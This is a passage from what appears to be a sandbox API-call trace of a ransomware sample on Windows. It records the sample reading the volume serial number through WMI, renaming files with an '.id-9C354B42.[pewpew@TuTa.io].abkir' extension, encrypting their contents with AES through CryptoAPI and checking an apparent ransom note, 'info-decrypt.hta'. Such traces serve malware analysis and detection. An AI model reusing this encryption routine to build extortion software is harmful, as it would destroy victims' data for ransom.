pszText=0x0) returned 0x0 [0207.868] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x691f2c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.868] CoGetContextToken (in: pToken=0x691ef38 | out: pToken=0x691ef38) returned 0x0 [0207.868] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0207.868] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edcc | out: ppvObject=0x691edcc*=0xb5b6f4) returned 0x0 [0207.868] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x3 [0207.868] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0207.868] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x691f2d0*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d0*=0x20, pszText=0x0) returned 0x0 [0207.868] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x691f2d0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.868] IWbemServices:GetObject (in: This=0x603331c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f284*=0x0, ppCallResult=0x0 | out: ppObject=0x691f284*=0x6028180, ppCallResult=0x0) returned 0x0 [0208.154] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x691f284 | out: puCount=0x691f284*=0x2) returned 0x0 [0208.154] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=4, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0xf, pszText=0x0) returned 0x0 [0208.154] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=4, puBuffLength=0x691f280*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f280*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.154] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3679ef8*=0, plFlavor=0x3679efc*=0 | out: pVal=0x691f280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3679ef8*=8, plFlavor=0x3679efc*=0) returned 0x0 [0208.154] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.154] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.154] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f288*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3679ef8*=8, plFlavor=0x3679efc*=0 | out: pVal=0x691f288*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3679ef8*=8, plFlavor=0x3679efc*=0) returned 0x0 [0208.154] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.154] SysStringByteLen (bstr="9C354B42") returned 0x10 [0208.155] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", lpFilePart=0x0) returned 0x2a [0208.155] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x4d [0208.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2e8) returned 1 [0208.155] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), fInfoLevelId=0x0, lpFileInformation=0x691f364 | out: lpFileInformation=0x691f364*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x355fa500, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0208.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2e4) returned 1 [0208.155] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), lpNewFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0208.156] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", lpFilePart=0x0) returned 0x38 [0208.156] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta", lpFilePart=0x0) returned 0x30 [0208.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f308) returned 1 [0208.156] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\office\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f384 | out: lpFileInformation=0x691f384*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32cea980, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32cea980, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32cea980, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0208.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f304) returned 1 [0208.156] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", lpFilePart=0x0) returned 0x38 [0208.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f354) returned 1 [0208.156] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), fInfoLevelId=0x0, lpFileInformation=0x367a3c0 | out: lpFileInformation=0x367a3c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e)) returned 1 [0208.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f350) returned 1 [0208.157] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", nBufferLength=0x105, lpBuffer=0x691ed94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", lpFilePart=0x0) returned 0x38 [0208.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f288) returned 1 [0208.157] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x27c [0208.157] GetFileType (hFile=0x27c) returned 0x1 [0208.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f284) returned 1 [0208.157] GetFileType (hFile=0x27c) returned 0x1 [0208.157] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x691f390 | out: lpFileSizeHigh=0x691f390*=0x0) returned 0x627e [0208.158] ReadFile (in: hFile=0x27c, lpBuffer=0x367de9c, nNumberOfBytesToRead=0x627e, lpNumberOfBytesRead=0x691f33c, lpOverlapped=0x0 | out: lpBuffer=0x367de9c*, lpNumberOfBytesRead=0x691f33c*=0x627e, lpOverlapped=0x0) returned 1 [0208.158] CloseHandle (hObject=0x27c) returned 1 [0208.158] CryptAcquireContextW (in: phProv=0x691f2dc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f2dc*=0xbdfae0) returned 1 [0208.159] CryptGenRandom (in: hProv=0xbdfae0, dwLen=0x10, pbBuffer=0x36847e0 | out: pbBuffer=0x36847e0) returned 1 [0208.520] CryptImportKey (in: hProv=0xbdfae0, pbData=0x3640e24, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f2ac | out: phKey=0x691f2ac*=0xb7f110) returned 1 [0208.520] CryptContextAddRef (hProv=0xbdfae0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.520] CryptContextAddRef (hProv=0xbdfae0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.520] CryptDuplicateKey (in: hKey=0xb7f110, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f29c | out: phKey=0x691f29c*=0xb7fc10) returned 1 [0208.520] CryptContextAddRef (hProv=0xbdfae0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0208.520] CryptSetKeyParam (hKey=0xb7fc10, dwParam=0x4, pbData=0x3640f04*=0x1, dwFlags=0x0) returned 1 [0208.520] CryptSetKeyParam (hKey=0xb7fc10, dwParam=0x1, pbData=0x3640ed0, dwFlags=0x0) returned 1 [0208.521] CryptEncrypt (in: hKey=0xb7fc10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3640f14*, pdwDataLen=0x691f308*=0x6280, dwBufLen=0x6280 | out: pbData=0x3640f14*, pdwDataLen=0x691f308*=0x6280) returned 1 [0208.521] CryptEncrypt (in: hKey=0xb7fc10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36471b8*, pdwDataLen=0x691f310*=0x0, dwBufLen=0x10 | out: pbData=0x36471b8*, pdwDataLen=0x691f310*=0x10) returned 1 [0208.522] CryptDestroyKey (hKey=0xb7f110) returned 1 [0208.523] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0208.523] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0208.523] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", nBufferLength=0x105, lpBuffer=0x691ed80, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", lpFilePart=0x0) returned 0x38 [0208.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f274) returned 1 [0208.523] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c [0208.524] GetFileType (hFile=0x32c) returned 0x1 [0208.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f270) returned 1 [0208.524] GetFileType (hFile=0x32c) returned 0x1 [0208.524] WriteFile (in: hFile=0x32c, lpBuffer=0x36477dc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f304, lpOverlapped=0x0 | out: lpBuffer=0x36477dc*, lpNumberOfBytesWritten=0x691f304*=0x20, lpOverlapped=0x0) returned 1 [0208.525] CloseHandle (hObject=0x32c) returned 1 [0208.525] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0208.525] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0208.526] CoTaskMemFree (pv=0xbed438) [0208.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0208.526] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f2b0 | out: ppv=0x691f2b0*=0xb51e34) returned 0x0 [0208.526] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f2a8 | out: pAptType=0x691f2a8*=1) returned 0x0 [0208.526] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f2ac | out: ppvObject=0x691f2ac*=0x0) returned 0x80004002 [0208.526] IUnknown:Release (This=0xb51e34) returned 0x1 [0208.671] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ec18 | out: ppv=0x691ec18*=0x6027220) returned 0x0 [0208.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027220, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ee30 | out: ppvObject=0x691ee30*=0x0) returned 0x80004002 [0208.671] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027220, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ee44 | out: ppvObject=0x691ee44*=0x6030940) returned 0x0 [0208.671] WbemDefPath:IUnknown:Release (This=0x6027220) returned 0x0 [0208.671] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea64 | out: ppvObject=0x691ea64*=0x6030940) returned 0x0 [0208.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ea20 | out: ppvObject=0x691ea20*=0x0) returned 0x80004002 [0208.672] WbemDefPath:IUnknown:AddRef (This=0x6030940) returned 0x3 [0208.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e37c | out: ppvObject=0x691e37c*=0x0) returned 0x80004002 [0208.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0208.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e338 | out: ppvObject=0x691e338*=0xbe25c0) returned 0x0 [0208.672] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe25c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e340 | out: pCid=0x691e340*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0208.672] WbemDefPath:IUnknown:Release (This=0xbe25c0) returned 0x3 [0208.672] CoGetContextToken (in: pToken=0x691e398 | out: pToken=0x691e398) returned 0x0 [0208.672] CoGetContextToken (in: pToken=0x691e7a0 | out: pToken=0x691e7a0) returned 0x0 [0208.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e830 | out: ppvObject=0x691e830*=0x0) returned 0x80004002 [0208.672] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x2 [0208.672] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x1 [0208.672] CoGetContextToken (in: pToken=0x691f128 | out: pToken=0x691f128) returned 0x0 [0208.672] CoGetContextToken (in: pToken=0x691f088 | out: pToken=0x691f088) returned 0x0 [0208.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x691f158*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f154 | out: ppvObject=0x691f154*=0x6030940) returned 0x0 [0208.672] WbemDefPath:IUnknown:AddRef (This=0x6030940) returned 0x3 [0208.672] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x2 [0208.673] WbemDefPath:IWbemPath:SetText (This=0x6030940, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x691f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d8*=0x20, pszText=0x0) returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=2, puBuffLength=0x691f2d8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030940, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030940, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030940, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x691f25c | out: puCount=0x691f25c*=0x0) returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f248 | out: puCount=0x691f248*=0x2) returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0x0, pszText=0x0 | out: puBuffLength=0x691f244*=0xf, pszText=0x0) returned 0x0 [0208.673] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f244*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0208.673] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1f8 | out: ppv=0x691f1f8*=0xb51e34) returned 0x0 [0208.673] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1f0 | out: pAptType=0x691f1f0*=1) returned 0x0 [0208.673] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1f4 | out: ppvObject=0x691f1f4*=0x0) returned 0x80004002 [0208.673] IUnknown:Release (This=0xb51e34) returned 0x1 [0208.674] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb60 | out: ppv=0x691eb60*=0x6027450) returned 0x0 [0208.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027450, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed78 | out: ppvObject=0x691ed78*=0x0) returned 0x80004002 [0208.675] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027450, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed8c | out: ppvObject=0x691ed8c*=0x60305c0) returned 0x0 [0208.675] WbemDefPath:IUnknown:Release (This=0x6027450) returned 0x0 [0208.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9ac | out: ppvObject=0x691e9ac*=0x60305c0) returned 0x0 [0208.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e968 | out: ppvObject=0x691e968*=0x0) returned 0x80004002 [0208.675] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0208.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e2c4 | out: ppvObject=0x691e2c4*=0x0) returned 0x80004002 [0208.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0208.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e280 | out: ppvObject=0x691e280*=0xbe2420) returned 0x0 [0208.675] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2420, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e288 | out: pCid=0x691e288*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0208.675] WbemDefPath:IUnknown:Release (This=0xbe2420) returned 0x3 [0208.675] CoGetContextToken (in: pToken=0x691e2e0 | out: pToken=0x691e2e0) returned 0x0 [0208.675] CoGetContextToken (in: pToken=0x691e6e8 | out: pToken=0x691e6e8) returned 0x0 [0208.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e778 | out: ppvObject=0x691e778*=0x0) returned 0x80004002 [0208.676] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0208.676] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0208.676] CoGetContextToken (in: pToken=0x691f070 | out: pToken=0x691f070) returned 0x0 [0208.676] CoGetContextToken (in: pToken=0x691efd0 | out: pToken=0x691efd0) returned 0x0 [0208.676] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x691f0a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f09c | out: ppvObject=0x691f09c*=0x60305c0) returned 0x0 [0208.676] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0208.676] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0208.676] WbemDefPath:IWbemPath:SetText (This=0x60305c0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0208.676] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x691f220 | out: puCount=0x691f220*=0x2) returned 0x0 [0208.676] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x691f21c*=0x0, pszText=0x0 | out: puBuffLength=0x691f21c*=0xf, pszText=0x0) returned 0x0 [0208.676] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, 